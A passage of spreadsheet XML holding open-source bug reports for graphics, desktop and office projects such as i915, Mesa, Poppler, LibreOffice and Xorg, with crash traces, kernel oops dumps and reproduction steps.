    key 	{	[ XF86Mail		]	}
    key 	{	[ XF86WWW		]	}
    key 	{	[ XF86Calculator	]	}
    // Extended function keys
    // In the Console before starting X in an init script preferably. 
    // Using setkeycodes e03b 212 e03c 213 e03d 214 e03e 215 e03f 216 e040 217 
    //       setkeycodes e041 218 e042 219 e043 220 e044 221 e057 222 e058 223 6d 206
    key 	{	[ XF86Support		]	}	// F1
    key 	{	[ XF86Word    		]	}	// F2
    key 	{	[ XF86Excel   		]	}	// F3
    key 	{	[ XF86Pictures		]	}	// F4
    key 	{	[ Undo			]	}	// F5
    key 	{	[ Redo			]	}	// F6
    key 	{	[ Print			]	}	// F7
    key 	{	[ XF86Save		]	}	// F8
    key 	{	[ XF86Launch1		]	}	// F9
    key 	{	[ XF86Launch2		]	}	// F10
    key 	{	[ XF86Launch3		]	}	// F11
    key 	{	[ XF86Launch4		]	}	// F12
}</t>
  </si>
  <si>
    <t>johnrw</t>
  </si>
  <si>
    <t>LIBCANBERRA-24139</t>
  </si>
  <si>
    <t>Assumption every GdkWindow has a X window crashes Epiphany recovery dialog</t>
  </si>
  <si>
    <t>Full bug report including trace:
https://qa.mandriva.com/show_bug.cgi?id=54010
Description of problem:
Epiphany crashed and after I tried to restart it the Recovery dialog appeared.
Then it crashes again regardless of the recover/don't recover choice with
this output on the console:
[reinout@localhost ~]$ epiphany
Gtk-Message: Failed to load module pk-gtk-module: libpk-gtk-module.so: kan
gedeeld objectbestand niet openen: Bestand of map bestaat niet
(epiphany:19360): Gdk-WARNING **: gdkdrawable-x11.c:952 drawable is not a
pixmap or window
The program 'epiphany' received an X Window System error.
This probably reflects a bug in the program.
The error was 'BadWindow (invalid Window parameter)'.
  (Details: serial 1188 error_code 3 request_code 20 minor_code 0)
  (Note to programmers: normally X errors are reported asynchronously
   that is you will receive the error a while after causing it.
   To debug your program run it with the --sync command line
   option to change this behavior. You can then get a meaningful
   backtrace from your debugger if you break on the gdk_x_error() function.)
Version-Release number of selected component (if applicable):
2.27.92
-------------------
irc conversation:
 looks like a libcanberra bug
 it assumes every GdkWindow has a X window which isn't true anymore for gtk
2.18
 so it calls XGetWindowProperty on None window which naturally doesn't work
 chpe: that doesn't explain why this wasn't a  problem before
epiphany crashed does it? Or is that just coincidence?
 maybe it's the recovery dialogue
 maybe canberra tries to play a sound for it?
 possibly
 let me try to disable sound
 bingo that's it</t>
  </si>
  <si>
    <t>reinouts</t>
  </si>
  <si>
    <t>DRI-82842</t>
  </si>
  <si>
    <t>[BYT-M]System unable go to S4 sporadically</t>
  </si>
  <si>
    <t>==System Environment==
--------------------------
Regression: Not sure.
Result on -next-queued(5193109cd669c7990b043a7187548546c16f8af3) was System unable resume from S3/S4 (Bug 81948)
Non-working platforms: BYT-M
==kernel==
--------------------------
origin/drm-intel-nightly: 49ceddc7b3b0e3f7eb21b9fb4c9b840cff630047(fails)
    drm-intel-nightly: 2014y-08m-19d-19h-02m-49s integration manifest
origin/drm-intel-next-queued: 3f72c7b12f1a81a32fd37216b3382e6fe46a7184(fails)
    drm/i915/bdw: Disable execlists by default
origin/drm-intel-fixes: 1a125d8a2c22b11741fc47d4ffcf7a5ffa044dd3(fails)
    drm/i915: don't try to retrain a DP link on an inactive CRTC
==Bug detailed description==
-----------------------------
Input 'echo disk &gt;/sys/power/state' and press enter the screen will light off but the power light still light on and the cpu fan still working.
The reproduce rate about 1 out of 10.
System unable resume from S3/S4 before(Bug 81948)
Because of system had no responding unable to get dmesg. 
==Reproduce steps==
---------------------------- 
1. echo disk &gt;/sys/power/state</t>
  </si>
  <si>
    <t>MESA-17865</t>
  </si>
  <si>
    <t>[i915] Bad texture indirect lookup counting</t>
  </si>
  <si>
    <t>The 915 driver is counting texture indirections incorrectly.  See ARB_fragment_program question (24) for details on texture indirection accounting -- they match our hardware quite well.  A simple summary of the failure would be a sample program that looks like:
---------------- phase 0
mul r0 t0 c0
mul r1 t1 c1
---------------- phase 1
texld r2 r0 s0
texld r3 r1 s1
mul oC r2 r3
Our driver would count this as
---------------- phase 0
mul r0 t0 c0
mul r1 t1 c1
---------------- phase 1
texld r2 r0 s0
---------------- phase 2
texld r3 r1 s1
mul oC r2 r3
We also fail to count indirections when the destination is write masked and when the destination has already been read or written in the current phase.</t>
  </si>
  <si>
    <t>TELEPATHY-34349</t>
  </si>
  <si>
    <t>TplEventSearchType not used or documented properly</t>
  </si>
  <si>
    <t>In certain function this enumeration seems not to be used as Flags which is odd. Most of the time it is used to differentiate contact target ID form room target ID. This should instead the TplEntityType from TplEntity object as the target is mainly an entity. Also in current search function this flag is simply not used which is also odd and need to be reviewed.</t>
  </si>
  <si>
    <t>DRI-79621</t>
  </si>
  <si>
    <t>[BDW]igt/kms_cursor_crc/cursor-size-change fails</t>
  </si>
  <si>
    <t>Created attachment 100386
dmesg
==System Environment==
--------------------------
Regression: No. 
It's new case
Non-working platforms: BDW
==kernel==
--------------------------
origin/drm-intel-nightly: 0a37b5d366831590ebc976018d1bd812ef526a98(fails)
    drm-intel-nightly: 2014y-06m-03d-19h-31m-28s integration manifest
origin/drm-intel-next-queued: 92d7377929140bc120f7742ee3afffcb2a827fe4(fails)
     drm/i915: Simplify intel_gpu_reset
origin/drm-intel-fixes: d23db88c3ab233daed18709e3a24d6c95344117f(fails)
    drm/i915: Prevent negative relocation deltas from wrapping
==Bug detailed description==
-----------------------------
igt/kms_cursor_crc/cursor-size-change fails
Output:
./kms_cursor_crc --run-subtest cursor-size-change
IGT-Version: 1.6-g3c70e6a (x86_64) (Linux: 3.15.0-rc3_drm-intel-next-queued_92d737_20140604+ x86_64)
Beginning cursor-size-change on pipe A connector eDP-1
cursor-size-change on pipe A connector eDP-1: PASSED
Beginning cursor-size-change on pipe B connector eDP-1
Test assertion failure function test_cursor_size file kms_cursor_crc.c:405:
Last errno: 0 Success
Failed assertion: igt_crc_equal(&amp;crc[i] &amp;ref_crc)
Subtest cursor-size-change: FAIL
==Reproduce steps==
---------------------------- 
1. ./kms_cursor_crc --run-subtest cursor-size-change</t>
  </si>
  <si>
    <t>LIBREOFFICE-71298</t>
  </si>
  <si>
    <t>FILEOPEN: soffice.bin crashed with SIGSEGV in shared_count()</t>
  </si>
  <si>
    <t>Trying to open a docx file immediately produces a crash. I'm forwarding the bug that I reported downstream in Ubuntu: https://bugs.launchpad.net/ubuntu/+source/libreoffice/+bug/1248263
The file that causes the crash is at https://bugs.launchpad.net/ubuntu/+source/libreoffice/+bug/1248263/+attachment/3900796/+files/aq131310162720369.docx
A stacktrace is available at https://launchpadlibrarian.net/155895337/Stacktrace.txt
Operating System: Ubuntu
Version: 4.1.2.3 release</t>
  </si>
  <si>
    <t>PACKAGEKIT-17573</t>
  </si>
  <si>
    <t>Spanish translation</t>
  </si>
  <si>
    <t>I need some context around the string Issued located in gnome-packagekit-gui for it's correctly translation to Spanish. 
Comment says: translators: this is a notice a restart might be required. Can this string be translated like Warning or Notice?
Thanks</t>
  </si>
  <si>
    <t>daniel.mustieles</t>
  </si>
  <si>
    <t>MESA-104690</t>
  </si>
  <si>
    <t>[G33] regression: piglit.spec.!opengl 1_4.draw-batch and gl-1_4-dlist-multidrawarrays</t>
  </si>
  <si>
    <t xml:space="preserve">Mesa 8e4efdc895eacca931b94a0c1fa01aae5c34463b introduced a regression on G33 for the following tests:
piglit.spec.!opengl 1_4.draw-batch
piglit.spec.!opengl 1_4.gl-1_4-dlist-multidrawarrays
commit 8e4efdc895eacca931b94a0c1fa01aae5c34463b
Author: Brian Paul 
Date:   Fri Jan 12 13:18:25 2018 -0700
    vbo: optimize some display list drawing (v2)
    The vbo_save_vertex_list structure records one or more glBegin/End
    primitives which all have the same vertex format.
    To draw these primitives we setup the vertex array state then
    issue the drawing command.  Before the 'start' vertex was typically
    zero and we used the vertex array pointer to indicate where the
    vertex data starts.
    This patch checks if the vertex buffer offset is an exact multiple of
    the vertex size.  If so that means we can use zero-based vertex array
    pointers and use the draw's start value to indicate where the vertex
    data starts.
    This means a series of display list drawing commands may have
    identical vertex array state.  This will get filtered out by the
    Gallium CSO module so we can issue a tight series of drawing commands
    without state changes to the device.
    Note that this also works for a series of glCallList commands (not
    just one list that contains multiple glBegin/End pairs).
    No Piglit or conform changes.
    v2: minor fixes suggested by Ian.
    Reviewed-by: Ian Romanick </t>
  </si>
  <si>
    <t>POPPLER-104581</t>
  </si>
  <si>
    <t>Abort while parsing GfxFunctionShading</t>
  </si>
  <si>
    <t>Created attachment 136661
GfxFunctionShading.pdf
Abort similar with #104354
I think that with time the fuzzer will find documents that crash on every call of getNum getBool etc...
backtrace:
#0  __GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:51
#1  0x00007ffff6d5ecaf in __GI_abort () at abort.c:90
#2  0x00007ffff77f798c in Object::getNum (this=) at /home/legarrec/info/programmation/poppler/poppler/Object.h:230
#3  GfxFunctionShading::parse (res=res@entry=0x5555557d64b0 dict=dict@entry=0x5555557d99b0 out=out@entry=0x5555557d6670 state=state@entry=0x5555557da510)
    at /home/legarrec/info/programmation/poppler/poppler/GfxState.cc:3763
#4  0x00007ffff78081f3 in GfxShading::parse (res=res@entry=0x5555557d64b0 obj=obj@entry=0x7fffffffd0c0 out=out@entry=0x5555557d6670
    state=state@entry=0x5555557da510) at /home/legarrec/info/programmation/poppler/poppler/GfxState.cc:3576
#5  0x00007ffff772b3b5 in GfxResources::lookupShading (this= name=0x5555557da860 Sh0 out=0x5555557d6670 state=0x5555557da510)
    at /home/legarrec/info/programmation/poppler/poppler/Gfx.cc:479
#6  0x00007ffff775210d in Gfx::opShFill (this=0x5555557d9740 args= numArgs=)
    at /home/legarrec/info/programmation/poppler/poppler/Gfx.cc:2400
#7  0x00007ffff774e8e1 in Gfx::go (this=this@entry=0x5555557d9740 topLevel=topLevel@entry=true)
    at /home/legarrec/info/programmation/poppler/poppler/Gfx.cc:738
#8  0x00007ffff7750834 in Gfx::display (this=this@entry=0x5555557d9740 obj=obj@entry=0x7fffffffd4d0 topLevel=topLevel@entry=true)
    at /home/legarrec/info/programmation/poppler/poppler/Gfx.cc:700
#9  0x00007ffff78a8281 in Page::displaySlice (this=0x5555557d9670 out=0x5555557d6670 hDPI=108 vDPI=108 rotate=0 useMediaBox=
    crop= sliceX=sliceX@entry=-1 sliceY=-1 sliceW=-1 sliceH=-1 printing=false abortCheckCbk=0x0 abortCheckCbkData=0x0
    annotDisplayDecideCbk=0x0 annotDisplayDecideCbkData=0x0 copyXRef=false) at /home/legarrec/info/programmation/poppler/poppler/Page.cc:560
#10 0x00007ffff78a8aef in Page::display (this= out= hDPI= vDPI= rotate=
    useMediaBox= crop= printing= abortCheckCbk=0x0 abortCheckCbkData=0x0 annotDisplayDecideCbk=0x0
    annotDisplayDecideCbkData=0x0 copyXRef=false) at /home/legarrec/info/programmation/poppler/poppler/Page.cc:481
#11 0x00007ffff78be705 in PDFDoc::displayPages (this=0x5555557d5700 out=0x5555557d6670 firstPage= lastPage=1 hDPI=108 vDPI=108 rotate=0
    useMediaBox=true crop=false printing=false abortCheckCbk=0x0 abortCheckCbkData=0x0 annotDisplayDecideCbk=0x0 annotDisplayDecideCbkData=0x0)
    at /home/legarrec/info/programmation/poppler/poppler/PDFDoc.cc:527
#12 0x00005555555612e8 in main (argc= argv=) at /home/legarrec/info/programmation/poppler/utils/pdftohtml.cc:392</t>
  </si>
  <si>
    <t>XORG-41149</t>
  </si>
  <si>
    <t>Xorg crashes on pressing multimedia keys</t>
  </si>
  <si>
    <t>Created attachment 51538
stack trace
to reproduce:
Start  server and xscreensaver lock screen
Press a key so that dialog appeas.
in quick succession press 'Esc' and 'Lock Desktop' keys.
    The 'Lock Desktop' key produces something very weird when pressed.
    I have no idea how to reproduce on a standard keyboard:
    ButtonPress event serial 27 synthetic NO window 0x2400001
        root 0x151 subw 0x2400002 time 121788805 (4235) root:(111978)
        state 0x0 button 2 same_screen YES
    EnterNotify event serial 27 synthetic NO window 0x2400001
        root 0x151 subw 0x0 time 121788805 (4235) root:(111978)
        mode NotifyGrab detail NotifyInferior same_screen YES
        focus YES state 512
    KeymapNotify event serial 27 synthetic NO window 0x0
        keys:  81  0   0   0   0   0   0   0   0   0   0   0   0   0   0   0
               0   0   0   0   0   0   0   0   0   0   0   0   0   0   0   0
    ButtonRelease event serial 27 synthetic NO window 0x2400001
        root 0x151 subw 0x2400002 time 121789061 (4235) root:(111978)
        state 0x200 button 2 same_screen YES
There may be other ways to reproduce but this works quite reliably. Once in the xscreensaver dialog it takes 2-3 tries to reproduce.
X.Org X Server 1.11.0
Release Date: 2011-08-26
X Protocol Version 11 Revision 0
Build Operating System: Linux 3.0.0-1-amd64 x86_64 Debian
Build Date: 28 August 2011  10:58:30AM
xorg-server 2:1.11.0-1 (Cyril Brulebois )</t>
  </si>
  <si>
    <t>LIBREOFFICE-48473</t>
  </si>
  <si>
    <t>No object information in status bar</t>
  </si>
  <si>
    <t>I have tested daily
master~2012-04-09_00.00.44_LibO-Dev_3.6.0alpha0_Win_x86_install_en-US.msi
The left field in the status bar in Draw should show object information for example length difference while dragging or angles of arc. But it has in all situations only the text Nothing.</t>
  </si>
  <si>
    <t>LIBREOFFICE-68681</t>
  </si>
  <si>
    <t>test not highligth in docx when there are w:highlight and w:shd</t>
  </si>
  <si>
    <t>I have a docx created with Office 2013 in this document a part of text is highligth with yellow.
I tried to open document.xml for analyze the problem and I see this part.
    test highligth yellow
when in document.xml there are w:shd and w:highlight w:highlight is ignored so in writer the text is not highligth and in Office 2013 yes.
If I remove w:shd the text is highligth on both correctly.
Thank you
Giovanni</t>
  </si>
  <si>
    <t>giovanni.nervi</t>
  </si>
  <si>
    <t>LIBREOFFICE-65257</t>
  </si>
  <si>
    <t>[FILESAVE] DOCX export of  background color</t>
  </si>
  <si>
    <t>Problem description: 
When exporting to DOCX a document with background color - it is not exported to the DOCX.
Steps to reproduce:
1. Create a new document using Writer
2. Set the document's background color to RED
3. Save the document as NEW.DOCX
4. Open NEW.DOCX in Word
5. No background color
Current behavior:
Background color is not exported to DOCX
Expected behavior:
Background color (of the 'default page style') should be exported to the DOCX
Operating System: Windows 8
Version: 4.0.3.3 release</t>
  </si>
  <si>
    <t>POPPLER-21080</t>
  </si>
  <si>
    <t>poppler/CairoFontEngine.cc fails to build due to munmap()</t>
  </si>
  <si>
    <t>Created attachment 24633
Patch to fix compilation issue.
The file poppler/CairoFontEngine.cc from 0.10.5 (and trunk) doesn't build on Solaris due to the way that munmap is called with an unsigned char* as opposed to a char* as the first parameter. 
The fix is to add a suitable cast to the function call as in the attached patch.</t>
  </si>
  <si>
    <t>LIBREOFFICE-39212</t>
  </si>
  <si>
    <t>Loss of OpenOffice default behavior for copying formulas EDITING</t>
  </si>
  <si>
    <t>In earlier versions of LibreOffice you could use the range of an adjacent column to copy a range of formulas using SHIFT and CTRL-down.
Example of earlier correct behavior in LibreOffice 3.3.2: you have a range of values in A1:A1000. You wish to copy a formula (any formula) from B1 to B2:B1000. You copy the formula in B1 using CTRL-C then move the cursor to B2 press SHIFT and (keeping SHIFT depressed) move the cursor to the left using the left arrow then pressing CTRL-down. The range extends automatically to the cell A1000. You move the cursor (still depressing SHIFT) to B1000 using the right arrow key then press CTRL-V to copy the formula. This behavior was highly useful for effortlessly copying formulas in large spreadsheets.
This desirable behavior no longer works in LibreOffice 3.4.1
Instead there is a slavish devotion to the way MS Excel works which requires manually extending the range in B2 using the mouse or repeatedly pressing the down arrow. This is a real pain in large spreadsheets. (Try it).
I tried enabling OpenOffice.org legacy behavior from the Tools/Optins/LibreOffice Calc/Compatibility menu to no avail. The irritating MS Excel-like behavior continued.
!!!THIS IS REALLY AGGRAVATING TO A LONG-TERM OOo/LibreOffice USER!!! and makes LibreOffice just as useless for serious spreadsheet work as MS Excel. 
This is a MAJOR inconvenience. Please restore the previous functionality for copying using adjacent columns in LibreOffice 3.4.2</t>
  </si>
  <si>
    <t>r2_2004_r</t>
  </si>
  <si>
    <t>DRI-107339</t>
  </si>
  <si>
    <t>[CI][BAT] kernel BUG at drivers/gpu/drm/i915/i915_gem_object.h:444!  invalid opcode: 0000</t>
  </si>
  <si>
    <t>https://intel-gfx-ci.01.org/tree/drm-tip/CI_DRM_4527/fi-icl-u/igt@drv_selftest@live_objects.html
[  594.788499] ------------[ cut here ]------------
[  594.788501] kernel BUG at drivers/gpu/drm/i915/i915_gem_object.h:444!
[  594.788523] invalid opcode: 0000 [#1] PREEMPT SMP PTI
[  594.788530] CPU: 2 PID: 9189 Comm: drv_selftest Tainted: G     U  W         4.18.0-rc6-CI-CI_DRM_4527+ #1
[  594.788540] Hardware name: Intel Corporation Ice Lake Client Platform/IceLake U DDR4 SODIMM PD RVP BIOS ICLSFWR1.R00.2222.A01.1805300339 05/30/2018
[  594.788607] RIP: 0010:check_partial_mapping+0x721/0x760 [i915]
[  594.788613] Code: 8e c8 c7 e0 48 8b 35 e6 3f 1c 00 49 c7 c0 43 af 58 a0 b9 bc 01 00 00 48 c7 c2 50 14 57 a0 48 c7 c7 1c dd 47 a0 e8 4f 59 ce e0  0b 41 89 c6 89 c6 48 c7 c7 70 3a 5a a0 e8 55 c8 c7 e0 44 89 74 
[  594.788676] RSP: 0018:ffffc900003f3a28 EFLAGS: 00010282
[  594.788683] RAX: 0000000000000009 RBX: 00000000000003fb RCX: 0000000000000000
[  594.788690] RDX: 0000000000000001 RSI: 0000000000000008 RDI: ffff8804ae660aa8
[  594.788697] RBP: 0000000000000000 R08: 00000000001f313f R09: ffff8804adc4d000
[  594.788704] R10: ffff880463d8a000 R11: ffff8804ae660aa8 R12: 0000000000000000
[  594.788711] R13: 0000000000000000 R14: 00000000000000fb R15: ffff880461354b40
[  594.788719] FS:  00007f5d14330980(0000) GS:ffff8804c0880000(0000) knlGS:0000000000000000
[  594.788727] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[  594.788733] CR2: 00007f5d03151780 CR3: 000000044b7c0005 CR4: 0000000000760ee0
[  594.788741] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
[  594.788748] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
[  594.788755] PKRU: 55555554
[  594.788759] Call Trace:
[  594.788809]  igt_partial_tiling+0x110/0x570 [i915]
[  594.788818]  ? __trace_bprintk+0x57/0x80
[  594.788873]  __i915_subtests+0x5e/0xf0 [i915]
[  594.788923]  __run_selftests+0x10b/0x190 [i915]
[  594.788968]  i915_live_selftests+0x2c/0x60 [i915]
[  594.789012]  i915_pci_probe+0x50/0xa0 [i915]
[  594.789020]  pci_device_probe+0xa1/0x130
[  594.789028]  driver_probe_device+0x306/0x480
[  594.789034]  __driver_attach+0xdb/0x100
[  594.789040]  ? driver_probe_device+0x480/0x480
[  594.789046]  ? driver_probe_device+0x480/0x480
[  594.789054]  bus_for_each_dev+0x74/0xc0
[  594.789061]  bus_add_driver+0x15f/0x250
[  594.789067]  ? 0xffffffffa06aa000
[  594.789072]  driver_register+0x56/0xe0
[  594.789078]  ? 0xffffffffa06aa000
[  594.789084]  do_one_initcall+0x58/0x370
[  594.789091]  ? do_init_module+0x1d/0x1ea
[  594.789098]  ? rcu_read_lock_sched_held+0x6f/0x80
[  594.789105]  ? kmem_cache_alloc_trace+0x282/0x2e0
[  594.789112]  do_init_module+0x56/0x1ea
[  594.789123]  load_module+0x2435/0x2b20
[  594.789134]  ? __se_sys_finit_module+0xd3/0xf0
[  594.789141]  __se_sys_finit_module+0xd3/0xf0
[  594.789150]  do_syscall_64+0x55/0x190
[  594.789157]  entry_SYSCALL_64_after_hwframe+0x49/0xbe
[  594.789164] RIP: 0033:0x7f5d13bfb839
[  594.789168] Code: 00 f3 c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 40 00 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05  3d 01 f0 ff ff 73 01 c3 48 8b 0d 1f f6 2c 00 f7 d8 64 89 01 48 
[  594.789233] RSP: 002b:00007fff7b7163f8 EFLAGS: 00000246 ORIG_RAX: 0000000000000139
[  594.789243] RAX: ffffffffffffffda RBX: 000056064e072c50 RCX: 00007f5d13bfb839
[  594.789250] RDX: 0000000000000000 RSI: 000056064e073900 RDI: 0000000000000004
[  594.789258] RBP: 000056064e073900 R08: 0000000000000004 R09: 0000000000000000
[  594.789266] R10: 00007fff7b716570 R11: 0000000000000246 R12: 0000000000000000
[  594.789274] R13: 000056064e06c6b0 R14: 0000000000000020 R15: 000000000000003b
[  594.789284] Modules linked in: i915(+) vgem snd_hda_codec_hdmi snd_hda_codec_realtek snd_hda_codec_generic ax88179_178a usbnet mii x86_pkg_temp_thermal coretemp crct10dif_pclmul crc32_pclmul snd_hda_codec ghash_clmulni_intel snd_hwdep snd_hda_core e1000e snd_pcm prime_numbers [last unloaded: i915]
[  594.789327] Dumping ftrace buffer:
[  594.789333] ---------------------------------
[  595.092068] RIP: 0010:check_partial_mapping+0x721/0x760 [i915]
[  595.092238] Code: 8e c8 c7 e0 48 8b 35 e6 3f 1c 00 49 c7 c0 43 af 58 a0 b9 bc 01 00 00 48 c7 c2 50 14 57 a0 48 c7 c7 1c dd 47 a0 e8 4f 59 ce e0  0b 41 89 c6 89 c6 48 c7 c7 70 3a 5a a0 e8 55 c8 c7 e0 44 89 74 
[  595.092784] RSP: 0018:ffffc900003f3a28 EFLAGS: 00010282
[  595.092795] RAX: 0000000000000009 RBX: 00000000000003fb RCX: 0000000000000000
[  595.092806] RDX: 0000000000000001 RSI: 0000000000000008 RDI: ffff8804ae660aa8
[  595.092924] RBP: 0000000000000000 R08: 00000000001f313f R09: ffff8804adc4d000
[  595.092938] R10: ffff880463d8a000 R11: ffff8804ae660aa8 R12: 0000000000000000
[  595.093048] R13: 0000000000000000 R14: 00000000000000fb R15: ffff880461354b40
[  595.093060] FS:  00007f5d14330980(0000) GS:ffff8804c08c0000(0000) knlGS:0000000000000000
[  595.093170] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[  595.093183] CR2: 00007f877afbb000 CR3: 000000044b7c0004 CR4: 0000000000760ee0
[  595.093195] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
[  595.093302] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
[  595.093314] PKRU: 55555554</t>
  </si>
  <si>
    <t>LIBREOFFICE-72788</t>
  </si>
  <si>
    <t>Clear direct formatting over more paragraphs freezes LibreOffice</t>
  </si>
  <si>
    <t>to reproduce:
- new document
- type first line 'this is text' enter second line 'more text'
- go to start of first line
- Shft-Arrow down (first paragraph selected cursor at start of second)
- Ctrl+M (Clear direct formatting ...)
 &gt; Writer Freezes</t>
  </si>
  <si>
    <t>XDGMIME-264</t>
  </si>
  <si>
    <t>doesn't handle nested magic patterns properly</t>
  </si>
  <si>
    <t>I'm pasting from http://bugzilla.gnome.org/show_bug.cgi?id=136071 (which has two
different patches to solve the problem)
Â« The attached patch fixes a bug with the xdgmime code where any elf
executable file would be sniffed as an application/x-core file. This
happens because of a bug in xdgmimemagic.c when the magic for a mime
type is composed of several 'indented' patterns.
xdgmimemagic.c reads the patterns one by one and each time it has read
one pattern it prepends them at the beginning of a list. With a file
created from
         &lt;- indent 0
           &lt;- indent 0
           &lt;- indent 1
          &lt;- indent 2
you'd have in memory a list composed of
(pattern with indent 2) (pattern with indent 1) (pattern with indent
0) (pattern with indent 0)
On the other hand the code in _xdg_mime_magic_matchlet_compare_level
assumes that the list it processes contains the parsed indented patterns
in the same order as the magic file which caused the misdetection of
the mime type of those elf executables.
I fixed that by mirroring the list of patterns the place where I'm
doing it may not be appropriate but files in /bin are now properly
identified as executable files. Â»</t>
  </si>
  <si>
    <t>TELEPATHY-54033</t>
  </si>
  <si>
    <t>Ignorelist for logger</t>
  </si>
  <si>
    <t>Created attachment 66088
Proposed patch
Hi
I've got an upstream request for being able to disable logging for specific contact. I've noticed that there is already some disabled API for this in logger so I tried to provid a basic implementation.
Maybe (probably) this is not exactly what you had in mind but if you tell me what to do better or point me the right direction I'll work on it :)</t>
  </si>
  <si>
    <t>dvratil</t>
  </si>
  <si>
    <t>MESA-91857</t>
  </si>
  <si>
    <t>i965 spilling is slow</t>
  </si>
  <si>
    <t>The Mesa linker is dreadfully slow. Compilation of my GLSL source on an i3-4010U takes just 63.9ms. The linker takes 88.2 seconds yes seconds.
An apples and oranges comparison: an Nvidia driver on an i7 platform with the same GLSL code compiles in 31.1ms and links in 12.5ms.
Proportionately this makes the Mesa linker 3400 times slower than the Nvidia linker apples-to-apples. My guess is that some linkage look-up has bad behaviour as the symbol table size grows.
The good news is that the shader runs just fine.</t>
  </si>
  <si>
    <t>CliveMcCarthy</t>
  </si>
  <si>
    <t>DRI-89835</t>
  </si>
  <si>
    <t>[bdw psr] OOPS intel_psr_ready+0x76/0x194</t>
  </si>
  <si>
    <t>[  288.752257] BUG: unable to handle kernel NULL pointer dereference at 0000000000000020
[  288.752283] IP: [] intel_psr_ready+0x76/0x194 [i915]
[  288.752372] PGD 14633c067 PUD 149b23067 PMD 0 
[  288.752389] Oops: 0000 [#1] SMP 
[  288.752399] Modules linked in: i915 uinput hid_generic usbhid hid loop x86_pkg_temp_thermal coretemp ghash_clmulni_intel aesni_intel aes_x86_64 ablk_helper cryptd lrw gf128mul glue_helper iTCO_wdt iTCO_vendor_support microcode pcspkr i2c_i801 battery xhci_pci xhci_hcd lpc_ich intel_gtt mfd_core usbcore drm_kms_helper usb_common ac acpi_pad acpi_cpufreq evdev processor sd_mod crc32c_intel ahci libahci libata scsi_mod thermal fan
[  288.752548] CPU: 3 PID: 4108 Comm: Xorg Tainted: G        W       4.0.0-rc6+ #199
[  288.752555] Hardware name: Intel Corporation Broadwell Client platform/SawTooth Peak BIOS BDW-E1R1.86C.0093.R00.1409071941 09/07/2014
[  288.752562] task: ffff8800367ed550 ti: ffff8800ab5dc000 task.ti: ffff8800ab5dc000
[  288.752568] RIP: 0010:[]  [] intel_psr_ready+0x76/0x194 [i915]
[  288.752637] RSP: 0018:ffff8800ab5dfa98  EFLAGS: 00010286
[  288.752643] RAX: 00000000fffffff9 RBX: ffff8800ab7d0000 RCX: 0000000000000003
[  288.752648] RDX: 0000000000000018 RSI: ffff880036b88c00 RDI: ffff8800a788b0e0
[  288.752654] RBP: ffff8800ab5dfab8 R08: 0000000000000000 R09: 0000000000000000
[  288.752659] R10: 0000000000000780 R11: 00000000000007ae R12: ffff88003548a000
[  288.752664] R13: 0000000000000000 R14: ffff8800a788b0e0 R15: ffff880036b88c00
[  288.752671] FS:  00007f5b6e064880(0000) GS:ffff88014ecc0000(0000) knlGS:0000000000000000
[  288.752677] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[  288.752682] CR2: 0000000000000020 CR3: 0000000148a49000 CR4: 00000000003407e0
[  288.752688] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
[  288.752693] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
[  288.752697] Stack:
[  288.752702]  ffff8800a788b000 0000000000000018 ffff880146170000 0000000000000000
[  288.752717]  ffff8800ab5dfb58 ffffffffa028be02 0000000000000000 0000000000000000
[  288.752736]  ffff880036b88c18 ffff8800ab7d0000 ffff8800356a8800 ffff8800a788b0e0
[  288.752751] Call Trace:
[  288.752824]  [] intel_dp_compute_config+0x1be/0x543 [i915]
[  288.752889]  [] intel_ddi_compute_config+0x66/0x6f [i915]
[  288.752953]  [] intel_modeset_compute_config+0x737/0xd79 [i915]
[  288.753011]  [] intel_crtc_set_config+0x830/0xc98 [i915]
[  288.753024]  [] ? _object_find+0x56/0x7a
[  288.753033]  [] drm_mode_set_config_internal+0x55/0xe2
[  288.753042]  [] drm_mode_setcrtc+0x448/0x4dd
[  288.753052]  [] drm_ioctl+0x27c/0x3da
[  288.753061]  [] ? fsnotify+0x26d/0x293
[  288.753070]  [] ? drm_mode_setplane+0x1c3/0x1c3
[  288.753080]  [] do_vfs_ioctl+0x419/0x461
[  288.753090]  [] ? fdput.isra.9+0xf/0x11
[  288.753099]  [] ? fdput_pos.isra.10+0x29/0x30
[  288.753107]  [] ? __fget+0x20/0x5a
[  288.753115]  [] SyS_ioctl+0x39/0x63
[  288.753125]  [] system_call_fastpath+0x12/0x17
[  288.753130] Code: e9 2b 01 00 00 41 8b 84 24 28 02 00 00 ff c8 75 1a 48 c7 c2 54 4b 2c a0 be 18 01 00 00 48 c7 c7 a2 4a 2c a0 31 c0 e8 79 f0 db e0  8b 45 20 ff c8 75 1a 48 c7 c2 98 4b 2c a0 be 19 01 00 00 48 
[  288.753309] RIP  [] intel_psr_ready+0x76/0x194 [i915]
[  288.753384]  RSP 
[  288.753390] CR2: 0000000000000020
(gdb) list *intel_psr_ready+0x76
0x61124 is in intel_psr_ready (./arch/x86/include/asm/atomic.h:27).
22	 *
23	 * Atomically reads the value of @v.
24	 */
25	static inline int atomic_read(const atomic_t *v)
26	{
27		return ACCESS_ONCE((v)-&gt;counter)
28	}
29	
30	/**
31	 * atomic_set - set atomic variable</t>
  </si>
  <si>
    <t>CAIRO-7767</t>
  </si>
  <si>
    <t>cairo re-embeds fonts for every size in PS and PDF</t>
  </si>
  <si>
    <t>Cairo re-embeds a subsetted font for every size of every font used in the PS and
PDF backends. This occurs with truetype type1 and outline type 3 fonts.</t>
  </si>
  <si>
    <t>DRI-29123</t>
  </si>
  <si>
    <t>KWin crash when changing desktop effects configuration</t>
  </si>
  <si>
    <t>(I've no idea if I filled the bug details correctly.  I just guessed.)
I reported this bug in bugs.kde.org but I've been told it's a bug in X and to report it here.
